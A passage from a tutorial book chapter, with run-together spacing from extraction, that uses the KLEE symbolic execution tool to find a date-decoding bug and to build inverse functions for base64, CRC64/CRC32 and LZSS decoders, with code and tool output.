77 case 7: s="August"; break;
78 case 8: s="September"; break;
79 case 9: s="October"; break;
80 case 10: s="November"; break;
81 case 11: s="December"; break;
82 default:
83 assert(0);
84 };
85
86 printf ("%04d-%s-%02d %02d:%02d:%02d\n", YEAR0+year, s, dayno+1, hour, minutes, seconds);
87 printf ("week day: %s\n", _days[wday]);
88 }
89
90 int main()
91 {
92 uint32_t time;
93
94 klee_make_symbolic(&time, sizeof time, "time");
95
96 decode_UNIX_time(time);
97
98 return 0;
99 }
Let’stryit:
% clang -emit-llvm -c -g klee_time1.c
...
% klee klee_time1.bc
KLEE: output directory is "/home/klee/klee-out-107"
KLEE: WARNING: undefined reference to function: printf
KLEE: ERROR: /home/klee/klee_time1.c:86: external call with symbolic argument: printf
90
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_time1.c:83: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 101579
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 2
Wow,assert()atline83hasbeentriggered,why? Let’sseeavalueofUNIXtimewhichtriggersit:
% ls klee-last | grep err
test000001.exec.err
test000002.assert.err
% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args : ['klee_time1.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 978278400
Let’sdecodethisvalueusingUNIXdateutility:
% date -u --date='@978278400'
Sun Dec 31 16:00:00 UTC 2000
Aftermyinvestigation,I’vefoundthat monthvariablecanholdincorrectvalueof12(while11ismaxi-
mal,forDecember),becauseLEAPYEAR()macroshouldreceiveyearnumberas2000,notas100. SoI’ve
introducedabugduringrewrittingthisfunction,andKLEEfoundit!
Justinteresting,whatwouldbeifI’llreplaceswitch()toarrayofstrings,likeitusuallyhappensinconcise
C/C++code?
...
const char *_months[] =
{
"January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"
};
...
while (dayno >= _ytab[LEAPYEAR(year)][month])
{
dayno -= _ytab[LEAPYEAR(year)][month];
month++;
}
char *s=_months[month];
printf ("%04d-%s-%02d %02d:%02d:%02d\n", YEAR0+year, s, dayno+1, hour, minutes, seconds);
printf ("week day: %s\n", _days[wday]);
...
KLEEdetectsattempttoreadbeyondarrayboundaries:
% klee klee_time2.bc
KLEE: output directory is "/home/klee/klee-out-108"
KLEE: WARNING: undefined reference to function: printf
KLEE: ERROR: /home/klee/klee_time2.c:69: external call with symbolic argument: printf
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_time2.c:67: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 101716
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 2
ThisisthesameUNIXtimevaluewe’vealreadyseen:
91
% ls klee-last | grep err
test000001.exec.err
test000002.ptr.err
% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args : ['klee_time2.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 978278400
So,ifthispieceofcodecanbetriggeredonremotecomputer,withthisinputvalue( inputofdeath ),it’s
possibletocrashtheprocess(withsomeluck,though).
OK,nowI’mfixingabugbymovingyearsubtractingexpressiontoline43,andlet’sfind,whatUNIXtime
valuecorrespondstosomefancydatelike2022-February-2?
1#include <stdint.h>
2#include <time.h>
3#include <assert.h>
4
5#define YEAR0 1900
6#define EPOCH_YR 1970
7#define SECS_DAY (24L * 60L * 60L)
8#define YEARSIZE(year) (LEAPYEAR(year) ? 366 : 365)
9
10 const int _ytab[2][12] =
11 {
12 { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 },
13 { 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 }
14 };
15
16 #define LEAPYEAR(year) (!((year) % 4) && (((year) % 100) || !((year) % 400)))
17
18 void decode_UNIX_time(const time_t time)
19 {
20 unsigned int dayclock, dayno;
21 int year = EPOCH_YR;
22
23 dayclock = (unsigned long)time % SECS_DAY;
24 dayno = (unsigned long)time / SECS_DAY;
25
26 int seconds = dayclock % 60;
27 int minutes = (dayclock % 3600) / 60;
28 int hour = dayclock / 3600;
29 int wday = (dayno + 4) % 7;
30 while (dayno >= YEARSIZE(year))
31 {
32 dayno -= YEARSIZE(year);
33 year++;
34 }
35
36 int month = 0;
37
38 while (dayno >= _ytab[LEAPYEAR(year)][month])
39 {
40 dayno -= _ytab[LEAPYEAR(year)][month];
41 month++;
42 }
43 year = year - YEAR0;
44
45 if (YEAR0+year==2022 && month==1 && dayno+1==22)
46 klee_assert(0);
47 }
48 int main()
49 {
50 uint32_t time;
51
52 klee_make_symbolic(&time, sizeof time, "time");
53
54 decode_UNIX_time(time);
55
56 return 0;
92
57 }
% clang -emit-llvm -c -g klee_time3.c
...
% klee klee_time3.bc
KLEE: output directory is "/home/klee/klee-out-109"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_time3.c:47: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 101087
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 1635
% ls klee-last | grep err
test000587.external.err
% ktest-tool --write-ints klee-last/test000587.ktest
ktest file : 'klee-last/test000587.ktest'
args : ['klee_time3.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 1645488640
% date -u --date='@1645488640'
Tue Feb 22 00:10:40 UTC 2022
Success,buthours/minutes/secondsareseemsrandom—theyarerandomindeed,because,KLEEsatisfied
allconstraintswe’veput,nothingelse. Wedidn’taskittosethours/minutes/secondstozeroes.
Let’saddconstraintstohours/minutes/secondsaswell:
...
if (YEAR0+year==2022 && month==1 && dayno+1==22 && hour==22 && minutes==22 && seconds==22)
klee_assert(0);
...
Let’srunitandcheck...
% ktest-tool --write-ints klee-last/test000597.ktest
ktest file : 'klee-last/test000597.ktest'
args : ['klee_time3.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 1645568542
% date -u --date='@1645568542'
Tue Feb 22 22:22:22 UTC 2022
Nowthatisprecise.
Yes,ofcourse,C/C++librarieshasfunction(s)toencodehuman-readabledateintoUNIXtimevalue,but
whatwe’vegothereisKLEEworking antipodeofdecodingfunction, inversefunction inaway.
9.8 Inverse function for base64 decoder
It’spieceofcakeforKLEEtoreconstructinputbase64stringgivenjustbase64decodercodewithoutcor-
responding encoder code. I’ve copypasted this piece of code from http://www.opensource.apple.com/
source/QuickTimeStreamingServer/QuickTimeStreamingServer-452/CommonUtilitiesLib/base64.c .
Weaddconstraints(lines84,85)sothatoutputbuffermusthavebytevaluesfrom0to15. Wealsotell
toKLEEthattheBase64decode()functionmustreturn16(i.e.,sizeofoutputbufferinbytes,line82).
1#include <string.h>
2#include <stdint.h>
3#include <stdbool.h>
4
5// copypasted from http://www.opensource.apple.com/source/QuickTimeStreamingServer/QuickTimeStreamingServer-452/
CommonUtilitiesLib/base64.c
93
6
7static const unsigned char pr2six[256] =
8{
9 /* ASCII table */
10 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
11 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
12 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
13 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
14 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
16 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
17 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
18 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
19 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
20 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
21 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
22 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
23 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
24 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
25 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
26 };
27
28 int Base64decode(char *bufplain, const char *bufcoded)
29 {
30 int nbytesdecoded;
31 register const unsigned char *bufin;
32 register unsigned char *bufout;
33 register int nprbytes;
34
35 bufin = (const unsigned char *) bufcoded;
36 while (pr2six[*(bufin++)] <= 63);
37 nprbytes = (bufin - (const unsigned char *) bufcoded) - 1;
38 nbytesdecoded = ((nprbytes + 3) / 4) * 3;
39
40 bufout = (unsigned char *) bufplain;
41 bufin = (const unsigned char *) bufcoded;
42
43 while (nprbytes > 4) {
44 *(bufout++) =
45 (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
46 *(bufout++) =
47 (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
48 *(bufout++) =
49 (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
50 bufin += 4;
51 nprbytes -= 4;
52 }
53
54 /* Note: (nprbytes == 1) would be an error, so just ingore that case */
55 if (nprbytes > 1) {
56 *(bufout++) =
57 (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
58 }
59 if (nprbytes > 2) {
60 *(bufout++) =
61 (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
62 }
63 if (nprbytes > 3) {
64 *(bufout++) =
65 (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
66 }
67
68 *(bufout++) = '\0';
69 nbytesdecoded -= (4 - nprbytes) & 3;
70 return nbytesdecoded;
71 }
72
73 int main()
74 {
75 char input[32];
76 uint8_t output[16+1];
77
78 klee_make_symbolic(input, sizeof input, "input");
79
80 klee_assume(input[31]==0);
81
94
82 klee_assume (Base64decode(output, input)==16);
83
84 for (int i=0; i<16; i++)
85 klee_assume (output[i]==i);
86
87 klee_assert(0);
88
89 return 0;
90 }
% clang -emit-llvm -c -g klee_base64.c
...
% klee klee_base64.bc
KLEE: output directory is "/home/klee/klee-out-99"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: ERROR: /home/klee/klee_base64.c:99: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_base64.c:104: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:85: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:81: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:65: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
...
We’reinterestingintheseconderror,where klee_assert() hasbeentriggered:
% ls klee-last | grep err
test000001.user.err
test000002.external.err
test000003.ptr.err
test000004.ptr.err
test000005.ptr.err
% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args : ['klee_base64.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 32
object 0: data: b'AAECAwQFBgcICQoLDA0OD4\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00'
Thisisindeedarealbase64string,terminatedwiththezerobyte,justasit’srequestedbyC/C++stan-
dards.Thefinalzerobyteat31thbyte(startingatzerothbyte)isourdeed:sothatKLEEwouldreportlesser
numberoferrors.
Thebase64stringisindeedcorrect:
% echo AAECAwQFBgcICQoLDA0OD4 | base64 -d | hexdump -C
base64: invalid input
00000000 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|
00000010
base64 decoder Linux utility I’ve just run blaming for “invalid input”—it means the input string is not
properlypadded. Nowlet’spaditmanually,anddecoderutilitywillnocomplainanymore:
% echo AAECAwQFBgcICQoLDA0OD4== | base64 -d | hexdump -C
00000000 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|
00000010
Thereasonourgeneratedbase64stringisnotpaddedisbecausebase64decodersareusuallydiscards
paddingsymbols(“=”)attheend. Inotherwords,theyarenotrequirethem,soisthecaseofourdecoder.
Hence,paddingsymbolsareleftunnoticedtoKLEE.
Soweagainmade antipodeorinversefunction ofbase64decoder.
95
9.9 CRC (Cyclic redundancy check)
9.9.1 Buffer alteration case #1
Sometimes,youneedtoalterapieceofdatawhichis protectedbysomekindofchecksumor CRC,andyou
can’tchangechecksumorCRCvalue,butcanalterpieceofdatasothatchecksumwillremainthesame.
Let’spretend,we’vegotapieceofdatawith“Hello,world!” stringatthebeginningand“andgoodbye”
stringattheend. Wecanalter14charactersatthemiddle,butforsomereason,theymustbein a..zlimits,
butwecanputanycharactersthere. CRC64ofthewholeblockmustbe 0x12345678abcdef12 .
Let’ssee77:
#include <string.h>
#include <stdint.h>
uint64_t crc64(uint64_t crc, unsigned char *buf, int len)
{
int k;
crc = crc;
while (len--)
{
crc ^= *buf++;
for (k = 0; k < 8; k++)
crc = crc & 1 ? (crc >> 1) ^ 0x42f0e1eba9ea3693 : crc >> 1;
}
return crc;
}
int main()
{
#define HEAD_STR "Hello, world!.. "
#define HEAD_SIZE strlen(HEAD_STR)
#define TAIL_STR " ... and goodbye"
#define TAIL_SIZE strlen(TAIL_STR)
#define MID_SIZE 14 // work
#define BUF_SIZE HEAD_SIZE+TAIL_SIZE+MID_SIZE
char buf[BUF_SIZE];
klee_make_symbolic(buf, sizeof buf, "buf");
klee_assume (memcmp (buf, HEAD_STR, HEAD_SIZE)==0);
for (int i=0; i<MID_SIZE; i++)
klee_assume (buf[HEAD_SIZE+i]>='a' && buf[HEAD_SIZE+i]<='z');
klee_assume (memcmp (buf+HEAD_SIZE+MID_SIZE, TAIL_STR, TAIL_SIZE)==0);
klee_assume (crc64 (0, buf, BUF_SIZE)==0x12345678abcdef12);
klee_assert(0);
return 0;
}
Since our code uses memcmp() standard C/C++ function, we need to add --libc=uclibc switch, so
KLEEwilluseitsownuClibcimplementation.
% clang -emit-llvm -c -g klee_CRC64.c
% time klee --libc=uclibc klee_CRC64.bc
Ittakesabout1minute(onmyIntelCorei3-3110M2.4GHznotebook)andwegettingthis:
...
real 0m52.643s
user 0m51.232s
sys 0m0.239s
...
% ls klee-last | grep err
test000001.user.err
test000002.user.err
77ThereareseveralslightlydifferentCRC64implementations,theoneIuseherecanalsobedifferentfrompopularones.
96
test000003.user.err
test000004.external.err
% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args : ['klee_CRC64.bc']
num objects: 1
object 0: name: b'buf'
object 0: size: 46
object 0: data: b'Hello, world!.. qqlicayzceamyw ... and goodbye'
Maybeit’sslow,butdefinitelyfasterthanbruteforce. Indeed, log2261465:8whichiscloseto64bits. In
otherwords,oneneed 14latincharacterstoencode64bits.AndKLEE+ SMTsolverneeds64bitsatsome
placeitcanaltertomakefinalCRC64valueequaltowhatwedefined.
Itriedtoreducelengthofthe middleblock to13characters:noluckforKLEEthen,ithasnospaceenough.
9.9.2 Buffer alteration case #2
Iwentsadistic:whatifthebuffermustcontaintheCRC64valuewhich,aftercalculationofCRC64,willresult
inthesamevalue? Fascinatedly,KLEEcansolvethis. Thebufferwillhavethefollowingformat:
Hello, world! <8 bytes (64-bit value)> and goodbye <6 more bytes>
int main()
{
#define HEAD_STR "Hello, world!.. "
#define HEAD_SIZE strlen(HEAD_STR)
#define TAIL_STR " ... and goodbye"
#define TAIL_SIZE strlen(TAIL_STR)
// 8 bytes for 64-bit value:
#define MID_SIZE 8
#define BUF_SIZE HEAD_SIZE+TAIL_SIZE+MID_SIZE+6
char buf[BUF_SIZE];
klee_make_symbolic(buf, sizeof buf, "buf");
klee_assume (memcmp (buf, HEAD_STR, HEAD_SIZE)==0);
klee_assume (memcmp (buf+HEAD_SIZE+MID_SIZE, TAIL_STR, TAIL_SIZE)==0);
uint64_t mid_value=*(uint64_t*)(buf+HEAD_SIZE);
klee_assume (crc64 (0, buf, BUF_SIZE)==mid_value);
klee_assert(0);
return 0;
}
Itworks:
% time klee --libc=uclibc klee_CRC64.bc
...
real 5m17.081s
user 5m17.014s
sys 0m0.319s
% ls klee-last | grep err
test000001.user.err
test000002.user.err
test000003.external.err
% ktest-tool --write-ints klee-last/test000003.ktest
ktest file : 'klee-last/test000003.ktest'
args : ['klee_CRC64.bc']
num objects: 1
object 0: name: b'buf'
object 0: size: 46
object 0: data: b'Hello, world!.. T+]\xb9A\x08\x0fq ... and goodbye\xb6\x8f\x9c\xd8\xc5\x00'
8bytesbetweentwostringsis64-bitvaluewhichequalstoCRC64ofthiswholeblock. Again,it’sfaster
thanbrute-forcewaytofindit. Iftodecreaselastspare6-bytebufferto4bytesorless,KLEEworkssolong
soI’vestoppedit.
97
9.9.3 Recovering input data for given CRC32 value of it
I’vealwayswantedtodoso,buteveryoneknowsthisisimpossibleforinputbufferslargerthan4bytes. As
myexperimentsshow,it’sstillpossiblefortinyinputbuffersofdata,whichisconstrainedinsomeway.
TheCRC32valueof6-byte“SILVER”stringisknown: 0xDFA3DFDD . KLEEcanfindthis6-bytestring,ifit
knowsthateachbyteofinputbufferisin A..Zlimits:
1#include <stdint.h>
2#include <stdbool.h>
3
4uint32_t crc32(uint32_t crc, unsigned char *buf, int len)
5{
6 int k;
7
8 crc = crc;
9 while (len--)
10 {
11 crc ^= *buf++;
12 for (k = 0; k < 8; k++)
13 crc = crc & 1 ? (crc >> 1) ^ 0xedb88320 : crc >> 1;
14 }
15 return crc;
16 }
17
18 #define SIZE 6
19
20 bool find_string(char str[SIZE])
21 {
22 int i=0;
23 for (i=0; i<SIZE; i++)
24 if (str[i]<'A' || str[i]>'Z')
25 return false;
26
27 if (crc32(0, &str[0], SIZE)!=0xDFA3DFDD)
28 return false;
29
30 // OK, input str is valid
31 klee_assert(0); // force KLEE to produce .err file
32 return true;
33 };
34
35 int main()
36 {
37 uint8_t str[SIZE];
38
39 klee_make_symbolic(str, sizeof str, "str");
40
41 find_string(str);
42
43 return 0;
44 }
% clang -emit-llvm -c -g klee_SILVER.c
...
% klee klee_SILVER.bc
...
% ls klee-last | grep err
test000013.external.err
% ktest-tool --write-ints klee-last/test000013.ktest
ktest file : 'klee-last/test000013.ktest'
args : ['klee_SILVER.bc']
num objects: 1
object 0: name: b'str'
object 0: size: 6
object 0: data: b'SILVER'
Still,it’snomagic: iftoremoveconditionatlines23..25(i.e.,iftorelaxconstraints),KLEEwillproduce
someotherstring,whichwillbestillcorrectfortheCRC32valuegiven.
Itworks,because6Latincharactersin A..Zlimitscontain 28:2bits: log226628:2,whichisevensmaller
valuethan32. Inotherwords,thefinalCRC32valueholdsenoughbitstorecover 28:2bitsofinput.
98
Theinputbuffercanbeevenbigger,ifeachbyteofitwillbeineventighterconstraints(decimaldigits,
binarydigits,etc).
9.9.4 In comparison with other hashing algorithms
Thingsarethateasyforsomeotherhashingalgorithmslike Fletcherchecksum ,butnotforcryptographically
secureones(likeMD5,SHA1,etc),theyareprotectedfromsuchsimplecryptoanalysis. Seealso: 10.
9.10 LZSS decompressor
I’ve googled for a very simple LZSS78decompressor and landed at this page: http://www.opensource.
apple.com/source/boot/boot-132/i386/boot2/lzss.c .
Let’spretend,we’relookingatunknowncompressingalgorithmwithnocompressoravailable. Willitbe
possibletoreconstructacompressedpieceofdatasothatdecompressorwouldgeneratedataweneed?
Hereismyfirstexperiment:
// copypasted from http://www.opensource.apple.com/source/boot/boot-132/i386/boot2/lzss.c
//
#include <string.h>
#include <stdint.h>
#include <stdbool.h>
//#define N 4096 /* size of ring buffer - must be power of 2 */
#define N 32 /* size of ring buffer - must be power of 2 */
#define F 18 /* upper limit for match_length */
#define THRESHOLD 2 /* encode string into position and length
if match_length is greater than this */
#define NIL N /* index for root of binary search trees */
int
decompress_lzss(uint8_t *dst, uint8_t *src, uint32_t srclen)
{
/* ring buffer of size N, with extra F-1 bytes to aid string comparison */
uint8_t *dststart = dst;
uint8_t *srcend = src + srclen;
int i, j, k, r, c;
unsigned int flags;
uint8_t text_buf[N + F - 1];
dst = dststart;
srcend = src + srclen;
for (i = 0; i < N - F; i++)
text_buf[i] = ' ';
r = N - F;
flags = 0;
for ( ; ; ) {
if (((flags >>= 1) & 0x100) == 0) {
if (src < srcend) c = *src++; else break;
flags = c | 0xFF00; /* uses higher byte cleverly */
} /* to count eight */
if (flags & 1) {
if (src < srcend) c = *src++; else break;
*dst++ = c;
text_buf[r++] = c;
r &= (N - 1);
} else {
if (src < srcend) i = *src++; else break;
if (src < srcend) j = *src++; else break;
i |= ((j & 0xF0) << 4);
j = (j & 0x0F) + THRESHOLD;
for (k = 0; k <= j; k++) {
c = text_buf[(i + k) & (N - 1)];
*dst++ = c;
text_buf[r++] = c;
r &= (N - 1);
}
}
}
return dst - dststart;
78Lempel–Ziv–Storer–Szymanski
99
}
int main()
{
#define COMPRESSED_LEN 15
uint8_t input[COMPRESSED_LEN];
uint8_t plain[24];
uint32_t size=COMPRESSED_LEN;
klee_make_symbolic(input, sizeof input, "input");
decompress_lzss(plain, input, size);
// https://en.wikipedia.org/wiki/Buffalo_buffalo_Buffalo_buffalo_buffalo_buffalo_Buffalo_buffalo
for (int i=0; i<23; i++)
klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
klee_assert(0);
return 0;
}
WhatIdidischangingsizeofringbufferfrom4096to32,becauseifbigger,KLEEconsumesall RAM79it
can.ButI’vefoundthatKLEEcanlivewiththatsmallbuffer.I’vealsodecreased COMPRESSED_LEN gradually
tocheck,whetherKLEEwouldfindcompressedpieceofdata,anditdid:
% clang -emit-llvm -c -g klee_lzss.c
...
% time klee klee_lzss.bc
KLEE: output directory is "/home/klee/klee-out-7"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: ERROR: /home/klee/klee_lzss.c:122: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_lzss.c:47: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_lzss.c:37: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_lzss.c:124: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 41417919
KLEE: done: completed paths = 437820
KLEE: done: generated tests = 4
real 13m0.215s
user 11m57.517s
sys 1m2.187s
% ls klee-last | grep err
test000001.user.err
test000002.ptr.err
test000003.ptr.err
test000004.external.err
% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args : ['klee_lzss.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 15
object 0: data: b'\xffBuffalo \x01b\x0f\x03\r\x05'
KLEEconsumed 1GBofRAMandworkedfor 15minutes(onmyIntelCorei3-3110M2.4GHznotebook),
buthereitis,a15byteswhich,ifdecompressedbyourcopypastedalgorithm,willresultindesiredtext!
Duringmyexperimentation,I’vefoundthatKLEEcandoevenmorecoolerthing,tofindoutsizeofcom-
pressedpieceofdata:
int main()
{
uint8_t input[24];
79Random-accessmemory
100
uint8_t plain[24];
uint32_t size;
klee_make_symbolic(input, sizeof input, "input");
klee_make_symbolic(&size, sizeof size, "size");
decompress_lzss(plain, input, size);
for (int i=0; i<23; i++)
klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
klee_assert(0);
return 0;
}
...butthenKLEEworksmuchslower,consumesmuchmoreRAMandIhadsuccessonlywithevensmaller
piecesofdesiredtext.
SohowLZSSworks?WithoutpeekingintoWikipedia,wecansaythat:if LZSScompressorobservessome
dataitalreadyhad,itreplacesthedatawithalinktosomeplaceinpastwithsize. Ifitobservessomething
yetunseen,itputsdataasis. Thisistheory. Thisisindeedwhatwe’vegot. Desiredtextisthree“Buffalo”
words,thefirstandthelastareequivalent,butthesecondis almostequivalent,differingwithfirstbyone
character.
That’swhatwesee:
'\xffBuffalo \x01b\x0f\x03\r\x05'
Hereissomecontrolbyte(0xff),“Buffalo”wordisplaced asis,thenanothercontrolbyte(0x01),thenwe
seebeginningofthesecondword(“b”)andmorecontrolbytes,perhaps,linkstothebeginningofthebuffer.
Thesearecommandtodecompressor,like,inplainEnglish,“copydatafromthebufferwe’vealreadydone,
fromthatplacetothatplace”,etc.
Interesting,isitpossibletomeddleintothispieceofcompresseddata? Outofwhim,canweforceKLEE
tofindacompresseddata,wherenotjust“b”characterhasbeenplaced asis,butalsothesecondcharacter
oftheword,i.e.,“bu”?
I’vemodifiedmain()functionbyadding klee_assume() : nowthe11thbyteofinput(compressed)data
(rightafter“b”byte)musthave“u”. Ihasnoluckwith15byteofcompresseddata,soIincreaseditto16
bytes:
int main()
{
#define COMPRESSED_LEN 16
uint8_t input[COMPRESSED_LEN];
uint8_t plain[24];
uint32_t size=COMPRESSED_LEN;
klee_make_symbolic(input, sizeof input, "input");
klee_assume(input[11]=='u');
decompress_lzss(plain, input, size);
for (int i=0; i<23; i++)
klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
klee_assert(0);
return 0;
}
...andvoilà: KLEEfoundacompressedpieceofdatawhichsatisfiedourwhimsicalconstraint:
% time klee klee_lzss.bc
KLEE: output directory is "/home/klee/klee-out-9"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: ERROR: /home/klee/klee_lzss.c:97: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_lzss.c:47: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_lzss.c:37: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_lzss.c:99: failed external call: klee_assert
101
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 36700587
KLEE: done: completed paths = 369756
KLEE: done: generated tests = 4
real 12m16.983s
user 11m17.492s
sys 0m58.358s
% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args : ['klee_lzss.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 16
object 0: data: b'\xffBuffalo \x13bu\x10\x02\r\x05'
Sonowwefindapieceofcompresseddatawheretwostringsareplaced asis: “Buffalo”and“bu”.
'\xffBuffalo \x13bu\x10\x02\r\x05'
Bothpiecesofcompresseddata,iffeededintoourcopypastedfunction,produce“BuffalobuffaloBuffalo”
textstring.
Please note, I still have no access to LZSScompressor code, and I didn’t get into LZSSdecompressor
detailsyet.
Unfortunately,thingsarenotthatcool:KLEEisveryslowandIhadsuccessonlywithsmallpiecesoftext,
andalsoringbuffersizehadtobedecreasedsignificantly(original LZSSdecompressorwithringbufferof
4096bytescannotdecompresscorrectlywhatwefound).
Nevertheless,it’sveryimpressive,takingintoaccountthefactthatwe’renotgettingintointernalsofthis
specificLZSSdecompressor. Oncemoretime,we’vecreated antipodeofdecompressor,or inversefunction .
Also, as it seems, KLEE isn’t very good so far with decompression algorithms (but who’s good then?).
I’vealsotriedvariousJPEG/PNG/GIFdecoders(which,ofcourse,hasdecompressors),startingwithsimplest
possible,andKLEEhadstuck.
9.11 strtodx() from RetroBSD
Just found this function in RetroBSD: https://github.com/RetroBSD/retrobsd/blob/master/src/libc/
stdlib/strtod.c . Itconvertsastringintofloatingpointnumberforgivenradix.
1#include <stdio.h>
2
3// my own version, only for radix 10:
4int isdigitx (char c, int radix)
5{
6 if (c>='0' && c<='9')
7 return 1;
8 return 0;
9};
10
11 /*
12 * double strtodx (char *string, char **endPtr, int radix)
13 * This procedure converts a floating-point number from an ASCII
14 * decimal representation to internal double-precision format.
15 *
16 * Original sources taken from 386bsd and modified for variable radix
17 * by Serge Vakulenko, <vak@kiae.su>.
18 *
19 * Arguments:
20 * string
21 * A decimal ASCII floating-point number, optionally preceded
22 * by white space. Must have form "-I.FE-X", where I is the integer
23 * part of the mantissa, F is the fractional part of the mantissa,
24 * and X is the exponent. Either of the signs may be "+", "-", or
25 * omitted. Either I or F may be omitted, or both. The decimal point
26 * isn't necessary unless F is present. The "E" may actually be an "e",
27 * or "E", "S", "s", "F", "f", "D", "d", "L", "l".
28 * E and X may both be omitted (but not just one).
29 *
30 * endPtr
31 * If non-NULL, store terminating character's address here.
102
32 *
33 * radix
34 * Radix of floating point, one of 2, 8, 10, 16.
35 *
36 * The return value is the double-precision floating-point
37 * representation of the characters in string. If endPtr isn't
38 * NULL, then *endPtr is filled in with the address of the
39 * next character after the last one that was part of the
40 * floating-point number.
41 */
42 double strtodx (char *string, char **endPtr, int radix)
43 {
44 int sign = 0, expSign = 0, fracSz, fracOff, i;
45 double fraction, dblExp, *powTab;
46 register char *p;
47 register char c;
48
49 /* Exponent read from "EX" field. */
50 int exp = 0;
51
52 /* Exponent that derives from the fractional part. Under normal
53 * circumstances, it is the negative of the number of digits in F.
54 * However, if I is very long, the last digits of I get dropped
55 * (otherwise a long I with a large negative exponent could cause an
56 * unnecessary overflow on I alone). In this case, fracExp is
57 * incremented one for each dropped digit. */
58 int fracExp = 0;
59
